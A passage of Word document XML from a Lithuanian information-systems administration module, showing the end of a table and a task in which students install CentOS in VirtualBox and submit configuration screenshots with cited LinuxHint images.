      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="297FBEA9" w14:textId="77777777" w:rsidTr="009574AA">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1686" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DE832EB" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5FF65103" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="078ED2A9" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D344675" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="5B3AC88D" w14:textId="77777777" w:rsidTr="009574AA">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1686" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24C2302A" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="48BE7BC5" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4E9F1D77" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="493A4375" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085353A" w:rsidRPr="005A5C28" w14:paraId="2DBD397C" w14:textId="77777777" w:rsidTr="009574AA">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1686" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="792CBC62" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="444402C6" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="002B337C" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1462CF73" w14:textId="77777777" w:rsidR="0085353A" w:rsidRPr="005A5C28" w:rsidRDefault="0085353A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6925BE2A" w14:textId="034349C1" w:rsidR="008629FA" w:rsidRPr="005A5C28" w:rsidRDefault="008629FA" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F49F6EE" w14:textId="77777777" w:rsidR="00B159D8" w:rsidRPr="005A5C28" w:rsidRDefault="00B159D8">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3297E411" w14:textId="765C5586" w:rsidR="004D1890" w:rsidRPr="005A5C28" w:rsidRDefault="004D1890" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Modulis „Informacinės sistemos priežiūra ir administravimas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B3DE31" w14:textId="77777777" w:rsidR="001C0B2B" w:rsidRPr="005A5C28" w:rsidRDefault="001C0B2B" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06B86E9E" w14:textId="77777777" w:rsidR="00D040C6" w:rsidRPr="005A5C28" w:rsidRDefault="00D040C6"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1 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ĮDIEGTI IR KONFIGŪRUOTI SERVERIO OPERACINĘ SISTEMĄ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C874C97" w14:textId="40A86978" w:rsidR="00426412" w:rsidRPr="005A5C28" w:rsidRDefault="00DC0673" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">LAUKIAMI </w:t>
      </w:r>
      <w:bookmarkStart w:id="13" w:name="_Hlk67821730"/>
      <w:r w:rsidR="00F23ED7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>REZULTATAI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidR="6F163ACE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="6F163ACE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="6F163ACE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>okinys turi pateikti</w:t>
      </w:r>
      <w:r w:rsidR="00426412" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> įdiegtos virtualios mašinos (VirtualBox arba analogo) ir C</w:t>
      </w:r>
      <w:r w:rsidR="00D040C6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ent</w:t>
      </w:r>
      <w:r w:rsidR="00426412" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>OS operacinės sistemos bei</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00426412" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>konfigūravimo ekrano vaizdus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D921F16" w14:textId="77777777" w:rsidR="00426412" w:rsidRPr="005A5C28" w:rsidRDefault="00426412" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pavyzdys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48716E33" w14:textId="6B00A17D" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="0FA16E19" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C636581" wp14:editId="3234DAD0">
            <wp:extent cx="3152775" cy="2638425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1458385014" name="Picture 145838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385014"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId201">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3152775" cy="2638425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B392E8E" w14:textId="14F45503" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="6F163ACE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1 pav. Įdiegta CENTOS į VirtualBox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A91689" w14:textId="75ADB8FD" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="6F163ACE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Šaltinis: How to Install CentOS 8 on VirtualBox. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LINUX HINT</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId202">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://linuxhint.com/install_centos8_virtualbox/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BA57B0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5551611C" w14:textId="6392EF09" w:rsidR="00BF7B83" w:rsidRPr="005A5C28" w:rsidRDefault="00BF7B83" w:rsidP="0089230F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="039F656E" w14:textId="1C1F9B41" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="48E419E3" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49A0F119" wp14:editId="285BABEA">
            <wp:extent cx="5943600" cy="600075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2121901479" name="Picture 212190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901479"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId203">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="600075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1D61D0" w14:textId="334B20CF" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="6F163ACE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2 pav. Įdiegta CENTOS į VirtualBox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2F9D70" w14:textId="2A753786" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="6F163ACE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Šaltinis:</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">How to Install CentOS 8 on VirtualBox. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LINUX HINT</w:t>
      </w:r>
      <w:r w:rsidR="66314E74" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId204">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://linuxhint.com/install_centos8_virtualbox/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BA57B0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28636081" w14:textId="7CD24861" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="007D6C3C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E9B499B" w14:textId="052C8B19" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="4BBE455C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11BA88B2" wp14:editId="02B136C7">
            <wp:extent cx="2733675" cy="2733675"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="75377227" name="Picture 7537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7227"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId205">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="27083" t="19725" r="26923" b="14449"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2733675" cy="2733675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
